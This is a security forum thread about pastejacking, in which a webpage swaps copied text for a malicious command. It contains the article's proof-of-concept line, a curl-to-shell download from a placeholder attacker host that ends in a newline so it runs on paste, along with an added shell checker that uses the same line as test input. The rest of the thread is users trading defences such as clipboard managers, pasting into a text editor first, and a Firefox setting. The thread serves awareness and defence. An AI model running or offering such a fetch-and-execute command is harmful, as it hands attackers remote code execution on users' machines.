Don't copy-paste commands from webpages — you can get hacked

Gandalf_The_Grey

Programmers, sysadmins, security researchers, and tech hobbyists copying-pasting commands from web pages into a console or terminal are warned they risk having their system compromised.

A technologist demonstrates a simple trick that'll make you think twice before copying and pasting text from web pages.

Recently, Gabriel Friedlander, founder of security awareness training platform Wizer, demonstrated an obvious yet surprising hack that'll make you cautious of copying-pasting commands from web pages.

It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal.

But Friedlander warns a webpage could be covertly replacing the contents of what goes on your clipboard, and what actually ends up being copied to your clipboard would be vastly different from what you had intended to copy.

Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late.

In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple command that most sysadmins and developers would be familiar with:

PoC command to be copy-pasted


Now, paste what you copied from Friedlander's blog into a text box or Notepad, and the result is likely to leave you surprised:

curl http://attacker-domain:8000/shell.sh | sh

Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end of it.

This means the above example would execute as soon as it's pasted directly into a Linux terminal.

Those pasting the text may have been under the impression they were copying the familiar, innocuous command sudo apt update that is used to fetch updated information on software installed on your system.

But that's not quite what happened.
 
Last edited by a moderator:
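
One way to check text before it goes into a terminal, flagging the trailing newline and the pipe-to-shell pattern the article describes. This is an added example, not code from the article or from any poster in this thread; the function name `audit_paste` and its three checks are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example: audit text before pasting it into an interactive shell.
# audit_paste TEXT -> prints findings; returns 0 if clean, 1 if suspicious.
nl='
'
cr=$(printf '\r')

audit_paste() {
    text=$1
    findings=0

    # Show the text unambiguously: sed's "l" ends each line with "$" and
    # prints control bytes as escapes, like a look in a plain text editor.
    printf '%s\n' "$text" | sed -n l

    # 1. A line break means the shell runs the text the moment it is pasted.
    case $text in
        *"$nl"*|*"$cr"*)
            echo "WARN: contains a line break (executes on paste)"
            findings=$((findings + 1)) ;;
    esac

    # 2. Bytes outside printable ASCII: escape sequences, lookalike letters.
    #    Conservative assumption: legitimate non-ASCII text is flagged too.
    hidden=$(printf '%s' "$text" | LC_ALL=C tr -d '\040-\176\n\r' | wc -c)
    if [ "$((hidden))" -gt 0 ]; then
        echo "WARN: $((hidden)) non-printable or non-ASCII byte(s)"
        findings=$((findings + 1))
    fi

    # 3. Output piped straight into a shell interpreter.
    if printf '%s\n' "$text" |
        grep -Eq '\|[[:space:]]*(sudo[[:space:]]+)?(ba|da|z)?sh([[:space:]]|$)'
    then
        echo "WARN: pipes data into a shell interpreter"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}

# Constructed demo: the pasted command from the article plus its newline.
audit_paste "curl http://attacker-domain:8000/shell.sh | sh$nl" || true
```

Shell command substitution `$(...)` strips trailing newlines, so text captured that way from a clipboard tool loses exactly the line break that check 1 looks for.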

wat0114

It copies both the harmless entry and malicious test code to my Linux clipboard.

This could allow an "audit" of the clipboard contents, then select only the harmless entry, or maybe better yet, find another source for the command(s).

I'm glad Mr.Chip in the comments posted something for Firefox.
dom.event.clipboardevents.enabled //changing to disable seems to prevent that. At least it worked on Windows for me.

Works in Linux too. Thanks!
 

Local Host

It copies both the harmless entry and malicious test code to my Linux clipboard.

This could allow an "audit" of the clipboard contents, then select only the harmless entry, or maybe better yet, find another source for the command(s).



Works in Linux too. Thanks!
You misunderstand, since you are checking the clipboard history; the latest entry is the one that will paste and is the security risk.
 

wat0114

You misunderstand, since you are checking the clipboard history; the latest entry is the one that will paste and is the security risk.

No, I would just have to click on the second clipboard entry "sudo apt update", and that one is safe to paste into, for example, the terminal. I tested it and it works. The point is I would "visually audit" the clipboard entries before making the selection, and as long as I'm reasonably observant, I should notice and avoid the unexpected and malicious code entry.

EDIT

Just to clarify, I emptied the clipboard before copying the test entry from here:


and two separate entries were revealed in the clipboard; the safe "sudo apt update" one and the malicious test code.
 

BladeRunner2049

When I simply put control-c and pasted it in, the text did not change. That is my go-to for when I copy commands, although that isn't really a solution in this case.
 

shmu26

It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications
This sounds scary. The guy writing your next app might incorporate malicious code into it.
The Linux command with automatic "enter" is also scary because you don't even get a chance to see what you pasted before it executes. Does it really work that way?
 

Local Host

This sounds scary. The guy writing your next app might incorporate malicious code into it.
The Linux command with automatic "enter" is also scary because you don't even get a chance to see what you pasted before it executes. Does it really work that way?
It can also be done on Windows, but you won't find average users on Windows using CMD.
 

wat0114

Just don't paste formatted text directly into a shell/terminal; use a simple text editor to reveal what is hidden.

Just for informational purposes, a little test I did earlier:


But the method you and others propose is certainly best practice.
 

SeriousHoax

Windows has a Clipboard function that's disabled by default. One can enable that and check clipboard entries before pasting. There are also third-party clipboard apps like Ditto (I use the portable version).
I use both, and they are extremely helpful in many situations as they can contain many entries. The only reason I also use Ditto is that Windows's clipboard isn't reboot persistent.
Also, as wat0114 showed, KDE also has a built-in clipboard. That's where I first started to use clipboards.
 

shmu26

Oh boy, that's what I like about a security forum, every once in a while you get a really juicy new kind of exploit to worry about.
Is this form of attack responsible for any major incidents as far as we know? Probably not.
So let's be careful, but on the other hand, such an attack probably won't come our way.
 

SeriousHoax

I'm glad Mr.Chip in the comments posted something for Firefox.
dom.event.clipboardevents.enabled //changing to disable seems to prevent that. At least it worked on Windows for me.
I forgot I was already using this in Firefox. I changed this flag so that I can copy texts from websites which don't let you copy.
So, killing two birds with one stone with this one.